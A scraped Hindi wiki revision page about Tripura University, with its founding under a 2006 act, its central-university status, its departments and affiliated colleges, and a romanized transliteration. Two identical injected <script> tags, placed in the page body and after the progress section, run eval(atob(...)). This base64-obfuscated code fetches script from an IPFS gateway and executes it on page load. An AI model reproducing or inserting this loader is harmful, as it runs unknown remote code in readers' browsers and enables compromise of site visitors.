Difference between revisions of "त्रिपुरा विश्वविद्यालय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*त्रिपुरा विश्वविद्यालय की स्थापना त्रिपुरा विधा...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
 +
[[चित्र:Tripura-University-Logo.gif|thumb|150px|त्रिपुरा विश्वविद्यालय]]
 
*त्रिपुरा विश्वविद्यालय की स्थापना [[त्रिपुरा]] विधान सभा के अधिनियम के तहत की गई थी, जिसे त्रिपुरा विश्वविद्यालय अधिनियम, 2006, जो [[2 जुलाई]], [[2007]] से प्रभावी हुआ, के तहत [[केन्द्रीय विश्वविद्यालय]] का दर्ज़ा दिया गया।
 
*त्रिपुरा विश्वविद्यालय की स्थापना [[त्रिपुरा]] विधान सभा के अधिनियम के तहत की गई थी, जिसे त्रिपुरा विश्वविद्यालय अधिनियम, 2006, जो [[2 जुलाई]], [[2007]] से प्रभावी हुआ, के तहत [[केन्द्रीय विश्वविद्यालय]] का दर्ज़ा दिया गया।
 
*वर्तमान में विश्वविद्यालय की अकादमिक गतिविधियां 2 संकायों और 22 विभागों के माध्यम से संचालित की जाती हैं।  
 
*वर्तमान में विश्वविद्यालय की अकादमिक गतिविधियां 2 संकायों और 22 विभागों के माध्यम से संचालित की जाती हैं।  

Latest revision as of 07:23, 22 July 2011

thumb|150px|tripura vishvavidyalay

  • tripura vishvavidyalay ki sthapana tripura vidhan sabha ke adhiniyam ke tahat ki gee thi, jise tripura vishvavidyalay adhiniyam, 2006, jo 2 julaee, 2007 se prabhavi hua, ke tahat kendriy vishvavidyalay ka darza diya gaya.
  • vartaman mean vishvavidyalay ki akadamik gatividhiyaan 2 sankayoan aur 22 vibhagoan ke madhyam se sanchalit ki jati haian.
  • tripura rajy ke vibhinn sthanoan par vishvavidyalay ke 29 sanbaddh k aaulej sthit haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh